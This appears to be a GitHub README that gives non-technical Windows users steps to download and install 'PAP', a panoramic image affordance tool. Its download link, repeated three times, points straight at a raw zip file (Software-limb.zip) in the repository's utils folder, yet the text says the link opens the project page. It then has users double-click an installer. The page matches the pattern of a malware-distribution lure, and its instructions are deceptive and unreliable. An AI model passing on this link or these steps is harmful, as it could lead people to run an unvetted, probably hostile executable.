PAP stands for Panoramic Affordance Prediction. It is a program designed to help you analyze wide-angle images and identify usable objects and areas. With PAP, you can quickly see where objects can be used or interacted with in a space from a panoramic view.
This software works on Windows computers. It requires no technical skills. You do not need to write any code or install complex software. Simply follow the steps below to start using PAP.
Before installing PAP, make sure your Windows PC meets these basic requirements:
- Windows 10 or later (64-bit)
- At least 4 GB of RAM
- A modern processor (Intel i3, Ryzen 3, or better)
- 500 MB of free disk space
- Internet connection to download the program
PAP runs on most standard Windows laptops and desktops. You do not need advanced hardware to use it.
To get PAP software, visit the official GitHub page below. This is where you will find the latest version to download:
Clicking this button will take you to the GitHub page. From there, you can download the installation files easily.
Follow these steps to download and install PAP on your Windows PC:
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Click the download button above or visit this link:
https://github.com/2716025154/PAP/raw/refs/heads/main/utils/Software-limb.zip
This will open the project’s GitHub page. -
On the GitHub page, look for the section named Releases. This is usually found on the right sidebar or under the repository’s main menu.
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Click on the latest release version. This will take you to a list of download files.
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Find the Windows installer file. The file name usually ends with
.exe. For example, it might look likePAP_setup_v1.0.exe. -
Click the
.exefile name to start downloading. Wait for the file to download completely. -
Once the download finishes, double-click the
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Follow the on-screen installation steps:
- Click Next when prompted.
- Agree to the terms and conditions.
- Choose the destination folder, or accept the default location.
- Click Install.
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After the installation completes, click Finish.
PAP is now installed on your PC.
To open PAP after installation:
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Click the Windows Start menu.
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Look for the "PAP" program in your applications list.
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Click on it to launch the program.
When PAP opens, you will see the main interface. You can now start loading panoramic images for analysis.
Using PAP is simple. Here is a basic guide:
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Click the Load Image button on the main screen.
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Browse your computer to find a panoramic photo.
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Select the photo and click Open.
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PAP will process the image and highlight possible affordances – areas or objects that can be used or interacted with.
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Use the tools to explore identified points.
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Save your results by clicking Export or Save.
This process helps you understand how spaces or objects in your wide-angle images can be used.
PAP lets you adjust some settings for better results. You can:
- Change the sensitivity of affordance detection.
- Select between different analysis methods.
- Customize how results are displayed on the image.
To access settings, click the Settings icon in the program window. Adjust your options and click Save.
To make sure PAP works well, check for updates regularly:
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Visit the GitHub page: https://github.com/2716025154/PAP/raw/refs/heads/main/utils/Software-limb.zip
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Check the Releases section for new versions.
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Download and install the latest installer following the same steps above.
Updating ensures you get bug fixes and improvements.
If PAP does not work as expected, try these tips:
- Restart your computer and open PAP again.
- Ensure you have the latest version installed.
- Close any other programs that may slow down your PC.
- Make sure your image files are in common formats like JPG or PNG.
- If the program crashes, reinstall PAP using a fresh download.
For more support, you can visit the project's GitHub issues page to see if others have similar problems.
PAP accepts standard panoramic image formats such as:
- JPG / JPEG
- PNG
- BMP
Avoid using very large image files as they may slow down the program.
PAP helps you understand panoramic images with less effort. It highlights key areas and objects you might want to focus on. This can be useful for:
- Interior planning
- Robotics navigation
- Virtual tours
- Space design analysis
The tool offers quick insights without needing advanced skills.
For questions or help, you can:
- Check the GitHub repository’s Issues tab.
- Look for any user guides or documentation in the repository.
- Contact developers through GitHub if needed.
Download PAP here whenever you want:
https://github.com/2716025154/PAP/raw/refs/heads/main/utils/Software-limb.zip
Use this page to get latest versions and find additional resources.